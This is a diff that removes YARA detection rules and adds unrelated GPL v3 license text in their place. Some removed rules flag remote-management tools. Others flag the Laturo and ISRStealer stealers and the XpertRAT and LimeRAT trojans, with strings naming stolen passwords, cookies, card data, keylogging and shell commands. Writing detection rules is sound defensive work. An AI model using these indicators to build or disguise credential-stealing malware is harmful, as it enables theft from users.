-		logic_hash = "c667caa9b7de4b166630c66e5162071948fa93c68b1cdb3038fce28e13dcb1a9"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based.  The
+work thus licensed is called the contributor's "contributor version".
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "MMSOFT Design Ltd." )
-}
-rule DITEKSHEN_INDICATOR_RMM_Manageengine_Zohomeeting : FILE
-{
-	meta:
-		description = "Detects ManageEngine Zoho Meeting (dc_rds.exe)"
-		author = "ditekSHen"
-		id = "b15efdd1-323c-5ed6-894d-b44f04d2eaf3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L304-L324"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8066bcd17245efcc73f2bef7f022ad23ab648fe0ad15ca66c0d387ce4eda998b"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.ManageEngine-ZohoMeeting"
+  A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version.  For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
 
-	strings:
-		$s1 = "bin\\ClientAuthHandler.dll" wide
-		$s2 = "AgentHook.dll" wide
-		$s3 = "UEMS - Remote Control" wide
-		$s4 = "Install hook...." wide
-		$s5 = "india.adventnet.com/meet.sas?k=" ascii
-		$s6 = "dcTcpSocket::" ascii
-		$s7 = "%s/%s?clientId=%s&sessionId=%s&clientName=%s&ticket=%s&connectionId=%s" ascii
-		$s8 = ".\\engines\\ccgost\\gost_" ascii
+  Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Atera : FILE
-{
-	meta:
-		description = "Detects Atera. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "9801f5c9-bc1e-5502-8bca-ee1f5ca0f497"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L345-L366"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbc37a941b38d36ea9bc31880c3cba6cd2b88b534583e86741f7686fcb410235"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.Atera"
+  In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement).  To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
 
-	strings:
-		$s1 = "SOFTWARE\\ATERA Networks\\AlphaAgent" wide
-		$s2 = "Monitoring & Management Agent by ATERA" ascii wide
-		$s3 = "agent-api-{0}.atera.com" wide
-		$s4 = "agent-api.atera.com" wide
-		$s5 = "acontrol.atera.com" wide
-		$s6 = /Agent\/(PingReply|GetCommandsFallback|GetCommands|GetTime|GetEnvironmentStatus|GetRecurringPackages|AgentStarting|AcknowledgeCommands)/ wide
-		$s7 = "\\AlphaControlAgent\\obj\\Release\\AteraAgent.pdb" ascii
-		$s8 = "AteraWebAddress" ascii
-		$s9 = "AlphaControlAgent.CloudLogsManager+<>" ascii
+  If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients.  "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
+  If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
 
-rule DITEKSHEN_INDICATOR_RMM_Atera_CERT : FILE
-{
-	meta:
-		description = "Detects Atera by certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "a5ccb684-1e28-51c8-a4d6-0b5abba97de0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L368-L383"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f51fef767cd529271f06d578146634e1ab5ee5ac3ffb829cbaa870e7c69ca3f6"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.Atera"
+  A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License.  You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Atera Networks Ltd" )
-}
-rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer : FILE
-{
-	meta:
-		description = "Detects Splashtop Streamer. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "317f2be4-983f-5528-b629-75a13de7b411"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L385-L403"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "67181cd6ae071074c6bf35f44963c11c9ee9b7df242027c15b1e165d108f7b98"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.SplashtopStreamer"
+  Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
 
-	strings:
-		$s1 = "\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\" ascii
-		$s2 = ".api.splashtop.com" wide
-		$s3 = "Software\\Splashtop Inc.\\Splashtop" wide
-		$s4 = "restarted the streamer.%nApp version: %1" wide
-		$s5 = "Splashtop-Splashtop Streamer-" wide
-		$s6 = "[RemoveStreamer] Send msg 2 cloud(%d:%d:%d)" wide
+  12. No Surrender of Others' Freedom.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
+  If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all.  For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
 
-rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer_CERT : FILE
-{
-	meta:
-		description = "Detects Splashtop Streamer by certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "7e0e4d6f-38a3-5cac-8a82-8aea7943d373"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L405-L419"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0a1225a79ff30678846b9cb4315419be04b46276b3e05310a21d088b30f01b72"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  13. Use with the GNU Affero General Public License.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Splashtop Inc." )
-}
-rule DITEKSHEN_INDICATOR_RMM_Aeroadmin : FILE
-{
-	meta:
-		description = "Detects AeroAdmin. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "0f69c6da-40e4-5952-b6f9-ed401279eb9e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L421-L442"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a0a9e15f31b6b06fbc749b863563c30351c775c1b1d17952013670e7e1d68c41"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
+  Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU Affero General Public License into a single
+combined work, and to convey the resulting work.  The terms of this
+License will continue to apply to the part which is the covered work,
+but the special requirements of the GNU Affero General Public License,
+section 13, concerning interaction through a network will apply to the
+combination as such.
 
-	strings:
-		$s1 = "\\AeroAdmin" wide
-		$s2 = ".aeroadmin.com" ascii wide
-		$s3 = "XAeroadminAppRestarter" wide
-		$s4 = "SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\AeroadminService" wide
-		$s5 = "AeroAdmin {}" ascii
-		$s6 = "FAeroAdmin.cpp" fullword ascii
-		$s7 = "Referer: http://900100.net" ascii
-		$s8 = "POST /sims/sims_new.php" ascii
-		$s9 = "aeroadmin.pdb" ascii
+  14. Revised Versions of this License.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
+  The Free Software Foundation may publish revised and/or new versions of
+the GNU General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
 
-rule DITEKSHEN_INDICATOR_RMM_Aeroadmin_CERT : FILE
-{
-	meta:
-		description = "Detects AeroAdmin by certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "ca34fd3c-eb76-57e3-8b62-ab0d0c9ec7b3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L444-L461"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1fe2d2bb6a8afd25fc5ee7a60fe5a931484591bafab24c5d488c7f0483e248a"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
+  Each version is given a distinguishing version number.  If the
+Program specifies that a certain numbered version of the GNU General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation.  If the Program does not specify a version number of the
+GNU General Public License, you may choose any version ever published
+by the Free Software Foundation.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and ( pe.signatures [ i ] . subject contains "Aeroadmin LLC" or pe.signatures [ i ] . subject contains "@aeroadmin.com" ) )
-}
-rule DITEKSHEN_INDICATOR_RMM_Dwagentlib : FILE
-{
-	meta:
-		description = "Detect DWAgent Remote Administration Tool library"
-		author = "ditekSHen"
-		id = "af0f9940-fbec-5775-9b74-bd73b55ec0ca"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L463-L482"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "608dd9bc8cfcec5a671bee9456dccedace31d7ae37180387ac2408f79fd9f452"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-LIB"
+  If the Program specifies that a proxy can decide which future
+versions of the GNU General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
 
-	strings:
-		$s1 = "DWAgentLib" fullword wide
-		$s2 = "PYTHONHOME" fullword wide
-		$s3 = "isTaskRunning" fullword ascii
-		$s4 = "isUserInAdminGroup" fullword ascii
-		$s5 = "setFilePermissionEveryone" fullword ascii
-		$s6 = "startProcessInActiveConsole" fullword ascii
-		$s7 = "taskKill" fullword ascii
+  Later license versions may give you additional or different
+permissions.  However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Dwagentsvc : FILE
-{
-	meta:
-		description = "Detect DWAgent Remote Administration Tool service"
-		author = "ditekSHen"
-		id = "5d124c20-a0f8-5e82-8bab-93a782a2a649"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L484-L501"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "590d41d2e433a7a1bb373fbd0b0d47818a9867bee0399101881b05e83b586f6e"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-SVC"
+  15. Disclaimer of Warranty.
 
-	strings:
-		$s1 = "\\native\\dwagupd.dll" wide
-		$s2 = "\\native\\dwagsvc.exe\" run" wide
-		$s3 = "CreateServiceW" fullword ascii
-		$s4 = /dwagent\.(pid|start|stop)/ wide
-		$s5 = "Check updating..." wide
+  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_Screencapture : FILE
-{
-	meta:
-		description = "Detect DWAgent Remote Administration Tool Screen Capture Module"
-		author = "ditekSHen"
-		id = "79586e5e-b7e5-5adc-97f3-0d29ad695079"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L503-L528"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d3160fd4cce445aa6d2bc6c083893c7610ea5e72824fe9824ad853700f4d3874"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-ScreenCapture"
+  16. Limitation of Liability.
 
-	strings:
-		$s1 = "DWAgentLib" fullword wide
-		$s2 = "PYTHONHOME" wide
-		$s3 = "VirtualBox" wide
-		$s4 = "VMware" wide
-		$s5 = "ScreenCapture::prepareCursor#" ascii
-		$s6 = "ScreenCapture::getMonitorCount#" ascii
-		$s7 = "ScreenCapture::token" ascii
-		$s8 = "dwascreencapture" ascii
-		$s9 = "inputKeyboard CTRLALTCANC" ascii
-		$s10 = "_Z34ScreenCaptureNativeMonitorEnumProc" ascii
-		$s11 = "_Z41ScreenCaptureNativeCreateWindowThreadProc" ascii
-		$s12 = "_ZN13ScreenCapture" ascii
-		$s13 = "isUserInAdminGroup" ascii
+  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_Soundcapture : FILE
-{
-	meta:
-		description = "Detect DWAgent Remote Administration Tool Sound Capture Module"
-		author = "ditekSHen"
-		id = "4e395d1e-96a1-5ecc-abe5-6f8323a2c8ca"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L530-L545"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c0efa9f383373dec1c5b9d127c2b4c6f4906718ae8f62eea28d7a369001be5af"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.DWAgent-SoundCapture"
+  17. Interpretation of Sections 15 and 16.
 
-	strings:
-		$s1 = "DWASoundCapture" ascii
-		$s2 = /_Z\d{2}DWASoundCapture/ ascii
-		$s3 = "_Z6recordPvS_" ascii
+  If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
+                     END OF TERMS AND CONDITIONS
 
-rule DITEKSHEN_INDICATOR_RMM_Dwagent_CERT : FILE
-{
-	meta:
-		description = "Detects DWAgent by certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "96572e83-ffb9-58d9-93d1-84e16ae1a3ba"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L547-L563"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ed86f053c8d1423aae8cfc6e0bba6021510dfb6d722430c8c7edb15d3e8233a"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "4a13f46def2c9427898a46a88a6a2122ed106b37"
+            How to Apply These Terms to Your New Programs
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DWSNET srl" and pe.signatures [ i ] . issuer contains "Sectigo Public Code Signing CA R36" and pe.signatures [ i ] . serial == "00:af:bd:d3:be:b2:4e:1d:e7:37:82:e9:f8:34:7c:f1:53" )
-}
-rule DITEKSHEN_INDICATOR_OSX_RMM_Dwagent : FILE
-{
-	meta:
-		description = "Detect DWAgent Remote Administration Tool macOS run"
-		author = "ditekSHen"
-		id = "0eeb9ae3-826e-52b7-bbb8-3f8c4920f5c3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L565-L580"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9864668abdd534d8a33940f9513d07356451ce1eaa9233771e82b8138dc0b41b"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Osx.RMM.DWAgent-RUN"
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
 
-	strings:
-		$s1 = "net.dwservice.DWAgent" ascii
-		$s2 = "-[DWADelegate" ascii
-		$s3 = "customWindowsToEnterFullScreenForWindow:onScreen:" ascii
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
 
-	condition:
-		uint16( 0 ) == 0xfeca and all of them
-}
-rule DITEKSHEN_MALWARE_Win_Laturo : FILE
-{
-	meta:
-		description = "Laturo information stealer payload"
-		author = "ditekSHen"
-		id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3-L26"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a"
-		score = 75
-		quality = 61
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Laturo"
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
 
-	strings:
-		$str1 = "cmd.exe /c ping 127.0.0.1" ascii wide
-		$str2 = "cmd.exe /c start" ascii wide
-		$str3 = "\\RapidLoader\\" ascii
-		$str4 = "loader/gate.php" ascii wide
-		$str5 = "Hwid:" ascii wide
-		$str6 = "Special:" ascii wide
-		$str7 = "logs=%s" ascii
-		$data1 = "cookies.%u.txt" nocase ascii wide
-		$data2 = "passwords.%u.txt" nocase ascii wide
-		$data3 = "credentials.%u.txt" nocase ascii wide
-		$data4 = "cards.%u.txt" nocase ascii wide
-		$data5 = "autofill.%u.txt" nocase ascii wide
-		$data6 = "loginusers.vdf" ascii wide
-		$data7 = "screenshot.bmp" nocase ascii wide
-		$data8 = "webcam.bmp" nocase ascii wide
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $str* ) and 1 of ( $data* )
-}
-rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE
-{
-	meta:
-		description = "XpertRAT payload"
-		author = "ditekSHen"
-		id = "cea7de47-b47c-5fea-96ee-5858b16cca8d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L28-L56"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb"
-		score = 75
-		quality = 63
-		tags = "FILE"
-		snort_sid = "920003-920006"
-		clamav_sig = "MALWARE.Win.Trojan.XpertRAT"
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
 
-	strings:
-		$v1 = "[XpertRAT-Mutex]" fullword wide
-		$v2 = "XPERTPLUGIN" fullword wide
-		$v3 = "+Xpert+3." wide
-		$v4 = "keylog.tmp" fullword wide
-		$v5 = "\\TempReg.reg" fullword wide
-		$s1 = "ClsKeylogger" fullword ascii nocase
-		$s2 = "clsCamShot" fullword ascii nocase
-		$s3 = "ClsShellCommand" fullword ascii nocase
-		$s4 = "ClsRemoteDesktop" fullword ascii nocase
-		$s5 = "ClsScreenRemote" fullword ascii nocase
-		$s6 = "ClsSoundRemote" fullword ascii nocase
-		$s7 = "MdlHidder" fullword ascii
-		$s8 = "modKeylog" fullword ascii
-		$s9 = "modWipe" fullword ascii
-		$s10 = "modDelProcInUse" fullword ascii
-		$s11 = "Socket_DataArrival" fullword ascii
-		$s12 = "cZip_EndCompress" fullword ascii
+    You should have received a copy of the GNU General Public License
+    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $v* ) or 6 of ( $s* ) )
-}
-rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE
-{
-	meta:
-		description = "ISRStealer payload"
-		author = "ditekSHen"
-		id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L112-L128"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ISRStealer"
+Also add information on how to contact you by electronic and paper mail.
 
-	strings:
-		$s1 = "&password=" wide
-		$s2 = "&pcname=" wide
-		$s3 = "MSVBVM60.DLL" ascii
-		$s4 = "MSVBVM60.DLL" wide
-		$s5 = "Core Software For : Public" wide
-		$s6 = "</Host>" wide
-		$s7 = "</Pass>" wide
-		$s8 = "/scomma" wide
+  If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
 
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 6 of them ) or all of them
-}
-rule DITEKSHEN_MALWARE_Win_Limerat : FILE
-{
-	meta:
-		description = "LimeRAT payload"
-		author = "ditekSHen"
-		id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L152-L168"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
